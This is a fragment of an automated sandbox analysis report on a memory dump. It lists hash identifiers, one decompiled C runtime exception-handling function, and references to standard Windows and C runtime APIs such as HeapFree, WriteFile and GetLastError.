                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 324c8b99be934e42b73d5b69e6a4a4c22446437738e1ecd13177cb8db08fc0ab
                                                                                                                                                                                                                                                              • Instruction ID: 3659f68c9fd5bd5048da5353bc84f82ed2cb837039db4d1e31ade8722ec22e84
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 324c8b99be934e42b73d5b69e6a4a4c22446437738e1ecd13177cb8db08fc0ab
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8121B373F208394B7B0CC47E8C572BDB6E1D78C501745823AE8A6EA2C1D968D917E2E4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: f7807b8d0183e27c42e7dfd1906928ff05cb0a37c4041d4da594efeb9a97cca4
                                                                                                                                                                                                                                                              • Instruction ID: c4d4e1c32ef758be2cc4454617ed34213f503a3ad77b8637be11f72a7d4022e1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7807b8d0183e27c42e7dfd1906928ff05cb0a37c4041d4da594efeb9a97cca4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84118A63F30C295B675C81AD8C172BAA5D3EBD925070F533AD826E7384E994DE23D290
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                                                                                              			E6E202264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                                                                              				signed int* _t43;
                                                                                                                                                                                                                                                              				char _t44;
                                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                                                                                              				long _t66;
                                                                                                                                                                                                                                                              				signed int* _t80;
                                                                                                                                                                                                                                                              				signed int* _t82;
                                                                                                                                                                                                                                                              				void* _t84;
                                                                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                                                                                              				void* _t95;
                                                                                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                                                                                              				void* _t99;
                                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t43 = _t84;
                                                                                                                                                                                                                                                              				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                              				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                              				_t89 = _t95;
                                                                                                                                                                                                                                                              				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                              				_push(_t65);
                                                                                                                                                                                                                                                              				_push(_t84);
                                                                                                                                                                                                                                                              				_push(_t89);
                                                                                                                                                                                                                                                              				asm("cld");
                                                                                                                                                                                                                                                              				_t66 = _a8;
                                                                                                                                                                                                                                                              				_t44 = _a4;
                                                                                                                                                                                                                                                              				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                              					_push(_t89);
                                                                                                                                                                                                                                                              					E6E2023CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                              					_t46 = 1;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					_v12 = _t44;
                                                                                                                                                                                                                                                              					_v8 = _a12;
                                                                                                                                                                                                                                                              					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                              					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                              					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                              					_t49 = E6E202485(_t66);
                                                                                                                                                                                                                                                              					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                              					if(_t49 == 0) {
                                                                                                                                                                                                                                                              						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                              							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                              							if(_t53 == 0) {
                                                                                                                                                                                                                                                              								L8:
                                                                                                                                                                                                                                                              								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                              								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								_t54 =  *_t53();
                                                                                                                                                                                                                                                              								_t89 = _t89;
                                                                                                                                                                                                                                                              								_t86 = _t86;
                                                                                                                                                                                                                                                              								_t66 = _a8;
                                                                                                                                                                                                                                                              								_t55 = _t54;
                                                                                                                                                                                                                                                              								_t106 = _t54;
                                                                                                                                                                                                                                                              								if(_t106 == 0) {
                                                                                                                                                                                                                                                              									goto L8;
                                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                                              									if(_t106 < 0) {
                                                                                                                                                                                                                                                              										_t46 = 0;
                                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                                              										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                              										E6E202370(_t55, _t66);
                                                                                                                                                                                                                                                              										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                              										E6E2023CB(_t89, _t66, 0);
                                                                                                                                                                                                                                                              										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                              										E6E202467(_t82[2], 1);
                                                                                                                                                                                                                                                              										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                                                                                              										_t66 = 0;
                                                                                                                                                                                                                                                              										_t86 = 0;
                                                                                                                                                                                                                                                              										 *(_t82[2])();
                                                                                                                                                                                                                                                              										goto L8;
                                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                                                                              						_t46 = 1;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				L13:
                                                                                                                                                                                                                                                              				return _t46;
                                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                                              0x6e202268
                                                                                                                                                                                                                                                              0x6e202269
                                                                                                                                                                                                                                                              0x6e20226a
                                                                                                                                                                                                                                                              0x6e20226d
                                                                                                                                                                                                                                                              0x6e20226f
                                                                                                                                                                                                                                                              0x6e202272
                                                                                                                                                                                                                                                              0x6e202273
                                                                                                                                                                                                                                                              0x6e202275
                                                                                                                                                                                                                                                              0x6e202276
                                                                                                                                                                                                                                                              0x6e202277
                                                                                                                                                                                                                                                              0x6e20227a
                                                                                                                                                                                                                                                              0x6e202284
                                                                                                                                                                                                                                                              0x6e202335
                                                                                                                                                                                                                                                              0x6e20233c
                                                                                                                                                                                                                                                              0x6e202345
                                                                                                                                                                                                                                                              0x6e20228a
                                                                                                                                                                                                                                                              0x6e20228a
                                                                                                                                                                                                                                                              0x6e202290
                                                                                                                                                                                                                                                              0x6e202296
                                                                                                                                                                                                                                                              0x6e202299
                                                                                                                                                                                                                                                              0x6e20229c
                                                                                                                                                                                                                                                              0x6e2022a0
                                                                                                                                                                                                                                                              0x6e2022a5
                                                                                                                                                                                                                                                              0x6e2022aa
                                                                                                                                                                                                                                                              0x6e20232a
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2022ac
                                                                                                                                                                                                                                                              0x6e2022ac
                                                                                                                                                                                                                                                              0x6e2022b8
                                                                                                                                                                                                                                                              0x6e2022ba
                                                                                                                                                                                                                                                              0x6e202315
                                                                                                                                                                                                                                                              0x6e202315
                                                                                                                                                                                                                                                              0x6e20231b
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2022bc
                                                                                                                                                                                                                                                              0x6e2022cb
                                                                                                                                                                                                                                                              0x6e2022cd
                                                                                                                                                                                                                                                              0x6e2022ce
                                                                                                                                                                                                                                                              0x6e2022cf
                                                                                                                                                                                                                                                              0x6e2022d2
                                                                                                                                                                                                                                                              0x6e2022d2
                                                                                                                                                                                                                                                              0x6e2022d4
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2022d6
                                                                                                                                                                                                                                                              0x6e2022d6
                                                                                                                                                                                                                                                              0x6e202320
                                                                                                                                                                                                                                                              0x6e2022d8
                                                                                                                                                                                                                                                              0x6e2022d8
                                                                                                                                                                                                                                                              0x6e2022dc
                                                                                                                                                                                                                                                              0x6e2022e4
                                                                                                                                                                                                                                                              0x6e2022e9
                                                                                                                                                                                                                                                              0x6e2022ee
                                                                                                                                                                                                                                                              0x6e2022fa
                                                                                                                                                                                                                                                              0x6e202302
                                                                                                                                                                                                                                                              0x6e202309
                                                                                                                                                                                                                                                              0x6e20230f
                                                                                                                                                                                                                                                              0x6e202313
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e202313
                                                                                                                                                                                                                                                              0x6e2022d6
                                                                                                                                                                                                                                                              0x6e2022d4
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2022ba
                                                                                                                                                                                                                                                              0x6e20232e
                                                                                                                                                                                                                                                              0x6e20232e
                                                                                                                                                                                                                                                              0x6e20232e
                                                                                                                                                                                                                                                              0x6e2022aa
                                                                                                                                                                                                                                                              0x6e20234a
                                                                                                                                                                                                                                                              0x6e202351

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                              • Instruction ID: 1b3ec0e939b1cef7118f1ca33bfc4696b4d166ef7505070f3b986fc2a34232cc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE21FB779002099FC700DFA8C8C09ABF7A6FF48314B458459D8158B286DB30F915C7E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.473316269.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                              • Instruction ID: 295f6a86d9ab769408d0b854e85f93a18192e45d0693605324e837d9d125b240
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C711E1733402059FD750CE99DC80EA373AAEB99231B258166ED18CB385D735EC49C760
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.473316269.000000006E281000.00000040.00020000.sdmp, Offset: 6E281000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                              • Instruction ID: 59c83383bfc811c8ecf3cd816a442333884f5e9919a385cb398983de1b71f7eb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D0145B731424A8FD708CF6DD9A4D6AB7E9FBE1321B15C07EC546C3616D230E809CA20
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                              • Instruction ID: 467307297ecc7fa7eb396883c19339f7891f81f50716a28168d6a6ed287c9405
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bebc977af7d34d5d22399dccb5525bf99a1a508f202cdd2d67311cd910c47a08
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6E04632911228EBCB10DBC88A00E8AB2EDEB46A54B114896A511E3210D270EE00C7D0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E25297E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556CE
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556E0
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2556F2
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255704
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255716
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255728
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25573A
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25574C
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E25575E
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255770
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255782
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E255794
                                                                                                                                                                                                                                                                • Part of subcall function 6E2556B1: _free.LIBCMT ref: 6E2557A6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252973
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252995
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529AA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529B5
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529EA
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2529F8
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A03
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A3B
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A42
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A5F
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E252A77
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                                              • Opcode ID: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction ID: a1f6c58fbec234201d03a5bc36db65965b970f2bf4816e9e9d317b879f3df945
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2706613bc3fe4d7871bb49d5b961138428d4b3bda9693c2543306a75642eae05
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E317E7260430ADFEB648BB4D940B9673FABF00315F214919E859D7394DB31E8608F54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2495CB
                                                                                                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6E2495F2
                                                                                                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E2496FE
                                                                                                                                                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 6E249753
                                                                                                                                                                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E2497D9
                                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E249860
                                                                                                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E24987B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 4234981820-393685449
                                                                                                                                                                                                                                                              • Opcode ID: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction ID: 160249d89df068963552cd649ea77627728e6263509fd8de27253d315037fbcb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b17fca80f3cb50e50b4d0ea7fb6e4f96aa1ff1f15266f60859f35ae1368ddf
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCC1477580420FEFCF19CFE8CA80A9EBBBAAF44315B10455AE8156B215D731DA61CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D27E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D28A
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D295
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2A0
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2AB
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2B6
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2C1
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2CC
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2D7
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E24D2E5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction ID: 1433ab1b34e22722da2806a0309129cf9853433b43f1ae47800fca3b43ae2161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6da5f92d362b55d93d3388bfef68d76fdb6f112e1e418cb8713eb5f4aefd41a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E21747A94010CEFCF45DFE4D890DDE7BBAEF08244B0189A6F9199B121DB71EA558F80
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction ID: fb11d168f9d7ad919091496241c2ee8d314936071d988ac48877c6ab8e3cc270
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5717e4bb782f467b2c0614b6691c31b0ca5f588a961291a44c73a8c66686b07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C1CFB4A0420E9FDB05CFD9C994FAEBBB6BF4A319F004559E8149B381E7709951CF21
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 6E255818: _free.LIBCMT ref: 6E25583D
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25589E
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: HeapFree.KERNEL32(00000000,00000000,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?), ref: 6E24D6A0
                                                                                                                                                                                                                                                                • Part of subcall function 6E24D68A: GetLastError.KERNEL32(?,?,6E255842,?,00000000,?,6E280096,?,6E255869,?,00000007,?,?,6E252AD1,?,?), ref: 6E24D6B2
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558A9
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E2558B4
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255908
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255913
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E25591E
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6E255929
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                              • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction ID: fee60e6893048a2432fc334691462a7326bdbd6e35a6d083ec0d53926620e21c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F116D75591B0CEBE720A7F0DD0AFCB779EAF00704F408C14B69E66250DB65A5554F90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E253593
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E253772
                                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6E25378F
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6E24F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2537D7
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E253817
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2538C3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4031098158-0
                                                                                                                                                                                                                                                              • Opcode ID: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction ID: afc0f8564cf7d9b32822ba571010b024c1d9b2059c3a6f6727d804321754e951
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f100bf019aaf72c076221a591bef9e9b3764a364c382b3106dcebdc342a62c44
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91D1B9B5D0024D9FDB05CFE8CA889EDBBB6BF09314F24116AE855BB345D330A916CB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6E248DA8,6E24700A,6E247312), ref: 6E2491A7
                                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2491B5
                                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2491CE
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,6E248DA8,6E24700A,6E247312), ref: 6E249220
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                                              • Opcode ID: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction ID: 676e20a78a045e76bfdf9cfb25cfec19599d546950a3838bc7cbc2bc4b3aef2b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c3ee54ed675d6a64d536ca859dc75e0d46927bce43e8f0bcdca5955d0280af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B00145B625AA1FDFFB0D06F9ED89D973A5BEB03779B200639E520410C0FB914834D120
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

